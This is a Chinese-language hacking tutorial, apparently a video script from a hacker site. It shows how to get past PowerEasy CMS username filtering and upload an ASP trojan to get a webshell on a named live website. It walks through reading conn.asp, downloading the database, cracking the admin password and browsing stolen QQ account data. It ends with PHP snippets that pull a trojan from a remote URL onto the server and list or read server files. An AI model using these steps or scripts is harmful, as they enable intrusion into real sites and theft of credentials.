--------------------------------------------------------------
黑客动画吧 http://www.hack58.com

致力于中国最专业的黑客安全站点

黑客动画吧，有你更精彩

--------------------------------------------------------------
大家好...
我是品味孤单

今天给大家带来的是 突破动易拿webshell
先来看一下演示
原来的.asp的用户名已经不能注册了

原理   : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是: 服务器是win2003 全功能的空间
用户注册地址 ： url+/Reg/User_Reg.asp
默认上传页面    ： url+user/Upload.asp?dialogtype=UserBlogPic&size=5

现在让我们来突破动易的限制

我们今天的目标是
http://www.bleach8.net/
为什么要入侵它呢
http://www.bleach8.net/ip.txt 呵呵 俗称黑吃黑

一
查看php配置信息 网站的绝对路径

二
读取conn.asp的内容

可以下载数据库 爆破管理员密码

三
读取网站目录
ip.txt 我的目标
myqq   盗过QQ的应该知道这底下是什么吧

四
突破上传限制 得到webshell

先把我们的asp木马改成TXT文件 上传到空间上去
免费的空间 好慢啊

看看我们的ASP木马运行成功了没有
呵呵 大家尽量的玩吧

由于我PHP实在不懂,google找了几个，难免有错误，多海涵啊。

php信息
<?php phpinfo(); ?>

写入文件
<?php
$bruce=fopen("木马地址","r");
if(!$bruce)
{
    echo'文件不存在';
    exit;
}
while (!feof($bruce))
{
    $rose=fgets($bruce);
        $james=fopen("服务器本地路径","a");
        fwrite($james,$rose);
        fclose($james);
}
fclose($bruce);
?>

目录读取
<?php
$base_dir = "filelist/";
$fso  = opendir($base_dir);
echo $base_dir."<hr/>"  ;
while($flist=readdir($fso)){
echo $flist."<br/>" ;
}
closedir($fso)
?>

读取文件
<?php
$file_handle = fopen("服务器本地地址", "r");
while (!feof($file_handle)) {
   $line = fgets($file_handle);
   echo $line;
}
fclose($file_handle);
?>

QQ 215749 群11096940(菜鸟俱乐部) 论坛ID close999
教材结束 谢谢观看..